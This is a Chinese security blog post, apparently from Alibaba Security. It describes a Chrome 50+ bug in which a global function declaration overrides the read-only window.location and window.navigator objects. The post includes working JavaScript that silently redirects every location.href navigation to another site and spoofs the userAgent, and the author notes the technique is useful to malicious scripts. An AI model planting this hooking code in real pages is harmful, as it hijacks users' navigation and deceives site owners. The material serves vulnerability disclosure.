Chrome出了个小bug:论如何在Chrome下劫持原生只读对象-阿里云开发者社区

开发者社区> 聚安全平台> 正文

Chrome出了个小bug:论如何在Chrome下劫持原生只读对象

简介: 最近发现Chrome出现了一个小“bug”,在Chrome 50+ 版本中,通过一些技巧可以轻易地重写只读对象,从而让恶意代码可以控制网页编写者的跳转行为。
+关注继续查看

Chrome出了个小bug

—— 论如何在Chrome下劫持原生只读对象


作者:负羽@阿里安全


概述

众所周知,虽然JavaScript是个很灵活的语言,浏览器里很多原生的方法都可以随意覆盖或者重写,比如alert。但是为了保证网页的安全性和网页制作者的一定控制权,有些浏览器对象是无法更改的,比如“window.location”对象,或者对它们的更改是无效的,比如”window.navigator”对象。然而,最近我发现Chrome出现了一个小“bug”,在Chrome 50+ 版本中,通过一些技巧可以轻易地重写这些对象,从而让恶意代码可以控制网页编写者的跳转行为。

实现window.location

location对象是个很特殊的浏览器内置对象,一般情况下是无法修改的,为了寻找是否有一种方法可以做到这件事,我做了一些尝试并得出了相应的结论:


1. 无法修改location对象,直接修改会导致页面跳转:

    window.location = {};

2. 无法通过Object.defineProperty来修改属性的configurable和writable,因此无法使用Object.watch及各种polyfill。 

    Object.defineProperty(location,"href",{"configurable": true});


3. 可以用Proxy对象代理location,但因为原因1,无法用locationProxy重写location对象。

    var locationProxy = new Proxy(location, {
      set: function (target, key, value, receiver) {
           console.log(target, key, value, receiver);
    }});

4. 可以freeze,使得对location.href赋值失效。然而这会影响到正常流程,因为光这样用户的代码逻辑就无法走通,劫持就失去了意义。 

    Object.freeze(window.location)
    Object.freeze(window)

看上去似乎没有任何办法能够做到了?然而山重水复疑无路,柳暗花明又一村。在尝试中我发现Chrome浏览器有个bug:在全局域里使用和location同名的函数声明,在函数自动提升后可以覆盖掉浏览器本身的window.location对象,没错,就是这样一行简单的代码: 

    function location(){}


这样就可以起到重写并hook掉location的作用。而这个方法也只有在Chrome下有用,其它浏览器(如Firefox或者Edge)会提示 TypeError: can't redefine non-configurable property location


那么既然拿到了修改的方法,应该如何合理地劫持它呢? 首先需要备份一下location对象本身,但由于我们的关键函数 function location(){}  本身是需要在全局域中执行,并且会自动提升,因此无法直接存储location对象。但是很多人都忽略的一点window.document对象中还有一份location对象,而这个对象,在目前浏览器中绝大多数情况下都和window.location没有区别,甚至就是对window.location的一份拷贝或者指针。于是我们可以使用window.document.location先备份一下location对象,然后修改之。

    var _location = window.document.location;

之后需要做的事情就是在劫持某些操作的时候,又保证正常的操作不会出问题,否则很容易被发现。我们可以使用ES5中的一些魔法方法,比如__proto__和__defineSetter__来实现我们需要的效果,比如我们对于location.href 的赋值操作,拦截并转向freebuf: 

    location.__proto__ = _location;

    location.__defineSetter__('href', function(url) {
      _location.href = "http://www.freebuf.com";
    });

    location.__defineGetter__('href', function(url) {
      return _location.href;
    });


或者使用ES6的Proxy代理,也同样可以实现相同功能:

   window.location = new Proxy(_location, {
       set: function(target, prop, value, receiver){
           if (prop !== 'href'){
               Reflect.set(target, prop, value, receiver);
           }else{
              target.href = "http://www.freebuf.com";
           }
       }
    })

 

最后,我们再将location对象设置为只读,防止轻易被修改

   Object.defineProperty(window,"location",{"writable": false});


这样就实现了一个暗藏玄机的window.location,偷偷将页面里所有通过location.href做的跳转改到了目标网站(freebuf)。 


实现window.navigator

就像我开头说的一样,不止是location,navigator对象我们也可以通过这种方法偷偷篡改,让网站得到的浏览器信息(如userAgent)失真,要注意的重点就是如何找到一种方法保存原来的navigator对象,这里我们使用新建一个iframe来实现:

    var _navigator;
    
    function navigator(){}

    var frame = document.createElement('iframe');
    frame.width = frame.height = 0;
    frame.style.display = "none";
    document.lastChild.appendChild(frame);

    _navigator = window.frames[0].window.navigator;

    window.navigator = new Proxy(_navigator, {
       set: function(target, prop, value, receiver){
           return Reflect.set(target, prop, value, receiver);
       },
       get: function(target, prop, receiver){
           if (prop === 'userAgent'){
              return "this is a faked userAgent";
           }
           return target[prop];
       }
    })



这段代码实现了让用户访问window.navigator.userAgemt时返回了一个假UA串。


总结

这个bug在Chrome 50至最新版内核中均存在,包括但不限于Chrome和各种使用Chromium内核的浏览器(Opera, UC)等。虽然由于局限性,独立存在的意义不大,但是在一些恶意脚本里还是存在一些利用的价值。


作者:负羽@阿里安全,更多安全类文章,请访问阿里聚安全博客

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云服务器怎么设置密码?怎么停机?怎么重启服务器?
如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
10089 0
Java网络编程从入门到精通(25):创建ServerSocket对象
本文为原创,如需转载,请注明作者和出处,谢谢! 上一篇:Java网络编程从入门到精通(24):实现HTTP断点续传下载工具(附源代码) ServerSocket类的构造方法有四种重载形式,它们的定义如下...
821 0
LUA面向对象编程技巧
详文请见 http://ffown.sinaapp.com/?p=11 1. LUA中的对象 我们知道,对象由属性和方法组成。LUA中最基本的结构是table,So 必须用table描述对象的属性。
666 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
13891 0
《JavaScript启示录》——第1章 JavaScript对象 1.1创建对象
JavaScript实际上是一种预包装若干原生对象构造函数的语言。这些构造函数用于生成一些表达特定类型值(如数字、字符串、函数、对象、数组等)的复杂对象,同样,也可以通过Function()对象创建自定义的对象构造函数(例如Person())。
1327 0
+关注
聚安全平台
阿里聚安全是一个移动安全开放平台,凝聚阿里巴巴多年来在无线业务安全防御的成功经验和技术成果,并面向开发者和企业提供恶意代码检测、漏洞扫描、仿冒应用检测、应用加固、安全组件等服务,一站式解决应用的安全问题。
121
文章
1
问答
文章排行榜
最热
最新
相关电子书
更多
《2021云上架构与运维峰会演讲合集》
立即下载
《零基础HTML入门教程》
立即下载
《零基础CSS入门教程》
立即下载